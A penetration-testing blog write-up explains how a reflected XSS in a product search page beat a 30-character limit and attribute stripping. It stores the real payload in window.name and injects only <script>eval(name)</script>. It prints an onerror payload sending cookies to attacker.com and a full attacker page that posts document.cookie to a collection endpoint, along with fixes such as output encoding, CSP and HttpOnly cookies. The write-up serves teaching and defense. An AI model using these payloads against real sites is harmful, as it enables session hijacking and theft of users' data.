Bypassing Filters with 'window.name' - A Hidden XSS Vector

Welcome back to our series on real-world penetration testing discoveries, where we highlight vulnerabilities that often fly under the radar. In previous articles, we examined everything from broken access control to SameSite cookie pitfalls. This time, we’re focusing on a more elusive threat—a Cross-Site Scripting (XSS) exploit that leverages the window.name property to bypass common filters and exfiltrate sensitive data. Despite strict character limits and partial sanitization, attackers can still piece together a devastating exploit when they understand browser behaviors and creative injection techniques.

Exploit the "Unexploitable" XSS: Using window.name to Steal Session Cookies

Cross-Site Scripting (XSS) is one of the most common and impactful web application vulnerabilities. It occurs when attackers can inject malicious scripts into webpages, causing these scripts to run in the browsers of other users. This can lead to session hijacking, data theft, or other unauthorized actions executed on behalf of the victim. In penetration tests, XSS is usually discovered by examining any functionality that reflects user input back to the browser—such as search forms, comment sections, or error messages. Testers inject various payloads, looking for indicators that the application has insufficiently sanitized or encoded the user-supplied data, allowing a script to slip through.
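The standard remedy is to encode reflected input for the context it lands in. The minimal sketch below shows the idea. The escapeHtml and noResultsMessage names are hypothetical and are not the target application's code. Once the query is HTML-encoded before it goes into an error message, even a valid script tag becomes inert text.

```javascript
// Minimal HTML-escaping helper for text reflected into an HTML body.
// "&" is replaced first so the entities produced afterwards are not re-escaped.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical "no results" message builder for a product search page.
function noResultsMessage(query) {
  return `<p>No products found for "${escapeHtml(query)}"</p>`;
}

console.log(noResultsMessage("<script>eval(name)</script>"));
// <p>No products found for "&lt;script&gt;eval(name)&lt;/script&gt;"</p>
```

The browser renders the encoded query as literal characters, so no script element is ever created, whatever the input length.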

In this specific case, the target application's product search feature reflected user input when no matching product was found. At first glance, it looked like a typical scenario: an error message displayed the user’s query, hinting at potential XSS. Closer inspection, however, showed that the application did apply sanitization measures, such as strict character limits and attribute removal. They weren’t enough to stop a creative exploit. By injecting a very short script snippet and leveraging the window.name property in Chrome, an attacker could bypass these defenses and execute arbitrary code.

Discovery and Testing



When we initially tested the search functionality, it was immediately clear that the application reflected user-supplied data in an error message. We decided to start with a basic payload:

```html
<script>prompt`1`</script>
```

Surprisingly, this worked on the first try, producing a pop-up labeled “1.” Encouraged by this quick success, we tried to escalate the proof of concept to something more dangerous, such as stealing session cookies (which were not protected by the HttpOnly attribute). Our excitement quickly turned to frustration, however, as the application sanitized nearly every more elaborate payload.

First, we tried adding more JavaScript inside the <script> tag, only to find that the whole input came back encoded. Next, we experimented with event attributes like onclick or onerror within benign HTML tags:

```html
<img src="x" onerror="fetch('http://attacker.com?cookie=' + document.cookie)">
```

But again, these attributes were removed, thwarting the exploit. After several experiments, it became evident that the application:

- Encoded any input longer than 30 characters.
- Stripped every attribute from HTML tags.
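Modeling the two observed rules makes it easier to reason about which payloads could survive. The sketch below is a hypothetical reconstruction inferred from the application's responses, not its actual source. The 30-character threshold comes from our testing. The function names, the regex, and the exact set of encoded characters are illustrative assumptions.

```javascript
// Hypothetical model of the observed filter, NOT the application's real code:
// inputs longer than 30 characters are HTML-encoded, and shorter inputs keep
// their tags but lose every attribute.
const MAX_RAW_LENGTH = 30;

// Assumed to encode at least &, < and >.
function encodeAll(input) {
  return input.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Rewrites "<tag anything>" as "<tag>"; closing tags such as "</script>" do not match.
function stripAttributes(input) {
  return input.replace(/<([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g, "<$1>");
}

function observedFilter(input) {
  return input.length > MAX_RAW_LENGTH ? encodeAll(input) : stripAttributes(input);
}

console.log(observedFilter("<script>prompt`1`</script>"));
// <script>prompt`1`</script>
console.log(observedFilter("<img src=x onerror=alert(1)>"));
// <img>
console.log(observedFilter("<script>alert(document.domain)</script>"));
// &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

Under this model, the original 26-character prompt payload passes untouched and a short image tag loses its event handler. Any longer script is encoded, which matches what we observed.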

It seemed like our quest to escalate this into a functional cookie-stealing XSS was doomed. Yet we remained determined to find a minimal payload that could deliver the goods.

Through research and creative tinkering, we realized that although we couldn’t inject meaningful script logic directly, we could separate the attack logic from the injected snippet itself. That’s where eval(...) came in.

In JavaScript, as in several other languages, the eval function takes a string and runs it as code at runtime. If we could stash our malicious code outside the injected script, where it wasn’t subject to the character limit or the sanitizing filters, and then pass it to eval(), we might still succeed. Hence, our next idea:
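Here is a quick illustration of that property, runnable in Node.js or a browser console. The executed logic lives entirely in a string defined elsewhere, and a short, fixed call runs it. The name stashedCode is hypothetical and stands in for wherever the code is stored.

```javascript
// Stand-in for code stored outside the injected snippet
// (in the attack described here, that role is played by window.name).
const stashedCode = "[1, 2, 3].map((n) => n * 2).join(',')";

// eval() parses the string as JavaScript, runs it, and returns the value
// of the last expression evaluated.
const result = eval(stashedCode);
console.log(result); // 2,4,6
```

The call site stays the same length no matter how large the stashed code grows. That is exactly what a strict length limit on the injected part fails to account for.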

```html
<script>eval(name)</script>
```

At 27 characters, this tiny snippet fits within the 30-character limit and contains no tag attributes, so it satisfies both sanitization rules. Because window is the global object in a browser, the bare identifier name resolves to window.name. That meant we could store the rest of the payload in that property and let eval execute it.

Why window.name?

The window.name property (name for short) is a little-known yet persistent piece of browser functionality that can carry data between different domains. Storage such as localStorage and sessionStorage is scoped to an origin, so a page on one domain cannot read what another domain stored there. window.name, by contrast, belongs to the browser tab rather than to an origin, and in some browsers it survives even as the tab navigates from one site to another. Browser behavior here varies. The persistence is particularly evident in Chrome, where it serves as the linchpin of the attack scenario.

From a developer’s perspective, window.name exists so that windows and frames can be referred to by name. A name can serve as the target of a link or form, or as the second argument to window.open(). Unless a page clears or overwrites it, or the browser resets it, the value stays with the tab for its lifetime. In many situations, this is convenient and harmless. When it comes to security, however, it can become a powerful channel for smuggling malicious content. Traditional server-side sanitization and content filters focus on data that is visibly sent in requests or reflected in HTML. window.name is set and read entirely in the browser and never appears in the request, so server-side filters never see it and it often slips under the radar.

In this case, once the application’s tight sanitization rules began encoding long payloads and removing attributes, the question arose: how could malicious code be introduced without exceeding the character limit or embedding suspicious tag attributes? The answer lay in using window.name as the container for that code. The attacker could store an entire script there, outside the reach of the application’s checks. Only a tiny snippet such as <script>eval(name)</script> then had to be injected into the search feature.
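On the target side, one way to take this channel away is to read and clear window.name in the very first script the page loads, before any reflected content is parsed. This is sketched here as a hypothetical defense-in-depth measure, not a fix. Classic scripts without async or defer run in document order, so an injected eval(name) further down the page would then evaluate an empty string. The sketch assumes the application does not rely on window.name itself. It also removes only this one channel, and the underlying XSS still has to be fixed by encoding the output. The function name neutralizeWindowName is illustrative.

```javascript
// Defense-in-depth sketch: read and clear window.name before any other script
// on the page can use it. Intended to run as the first script in <head>.
function neutralizeWindowName(win) {
  const previous = win.name; // whatever a previously visited page left behind
  win.name = "";
  return previous;
}

// In a browser this would be neutralizeWindowName(window).
// A plain object stands in for window so the sketch also runs in Node.js.
const fakeWindow = { name: "payload planted by a previously visited site" };
const discarded = neutralizeWindowName(fakeWindow);
console.log(JSON.stringify(fakeWindow.name)); // ""
```

The returned value could be reported to a monitoring endpoint. A non-empty window.name on arrival at a page that never sets one is a useful signal.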

Exploitation Path

Armed with this theory, we began building a working PoC. Our first step was to create a malicious webpage on a domain we controlled. When the victim’s tab loads this page, a script assigns window.name a string capable of exfiltrating cookies from the target web application and then redirects the tab. Here is the malicious webpage:

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>example.com</title>
  <script>
    // Set the window.name property. It stays with the tab across the redirect
    // below; localhost:9002 is the collection endpoint used in this PoC.
    window.name = 'fetch("http://localhost:9002/data",{method:"POST",mode:"no-cors",body:document.cookie});';

    // Redirect the user to the web application. The URL-encoded query decodes
    // to <script>eval(name)</script>.
    location = "//example.com/en-us/search?query=%3Cscript%3Eeval(name)%3C/script%3E";
  </script>
</head>
<body>
  <p>exampleCorp</p>
</body>
</html>
```

After storing the payload in window.name, the malicious webpage redirected the victim’s browser to the target application’s search endpoint with the small payload we saw earlier, which is under thirty characters. This reduced injection, <script>eval(name)</script>, evaded the tight length restrictions and attribute filters because the real logic was already carried in the window.name property. When the vulnerable page loaded, the browser executed the reflected <script> tag, which evaluated the contents of window.name and ran the payload.

Throughout this transition, the victim would see only a brief navigation from the attacker’s site to the legitimate one. As soon as the search results page rendered, the injected code ran in the background and sent the session cookies to the attacker’s server. The application’s sanitization measures became irrelevant because the heavy lifting happened in window.name. That property is beyond the reach of server-side filters and rarely accounted for in standard XSS defenses.

Conclusion

By combining a minimal script injection with the persistence of window.name, an attacker can circumvent tight sanitization rules and character limits. The application’s stringent length limit and thorough attribute stripping looked as if they would neutralize any XSS attempt, yet a 27-character payload was enough. This method is a reminder that no single defensive measure, be it sanitization, length limits, or basic script filtering, provides complete security on its own. The root fix is to encode reflected input for the HTML context it lands in. Beyond that, true protection calls for defense in depth. That means strict server-side validation and a Content Security Policy that disallows inline scripts and eval(). It also means session cookies marked HttpOnly so that document.cookie cannot read them, and awareness of browser behaviors like window.name that let attacker data bypass server-side filters.
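Here is a rough sketch of the header-level layers, assuming a Node.js backend. The target's actual stack is unknown, and the securityHeaders helper and the cookie name session are hypothetical. The response carries a restrictive CSP and an HttpOnly session cookie. With script-src 'self' and neither 'unsafe-inline' nor 'unsafe-eval', the browser refuses to run a reflected inline script and also blocks eval().

```javascript
// Hypothetical helper: response headers for the search page.
// - script-src 'self' (no 'unsafe-inline', no 'unsafe-eval') stops the browser
//   from running a reflected inline <script> and from executing eval().
// - HttpOnly keeps the session cookie out of document.cookie.
// - Secure sends the cookie over HTTPS only.
function securityHeaders(sessionId) {
  return {
    "Content-Security-Policy": "script-src 'self'; object-src 'none'; base-uri 'none'",
    "Set-Cookie": `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Print the headers that would be sent for a placeholder session ID.
for (const [header, value] of Object.entries(securityHeaders("example-session-id"))) {
  console.log(`${header}: ${value}`);
}
```

In a Node.js http handler, each pair could be applied with res.setHeader(header, value). Neither header replaces output encoding. They limit the damage when encoding is missed. Because of the Secure flag, local testing over plain HTTP would not send the cookie back.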

If you’re concerned about hidden vulnerabilities in your applications, consider reaching out to our team. We specialize in uncovering the tricky pitfalls that slip through automated scans, helping businesses fortify their defenses against ever-evolving threats.